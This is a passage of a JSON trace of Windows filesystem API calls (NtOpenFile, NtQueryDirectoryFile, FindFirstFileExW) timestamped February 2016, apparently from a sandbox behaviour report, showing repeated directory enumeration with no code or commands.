"timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": 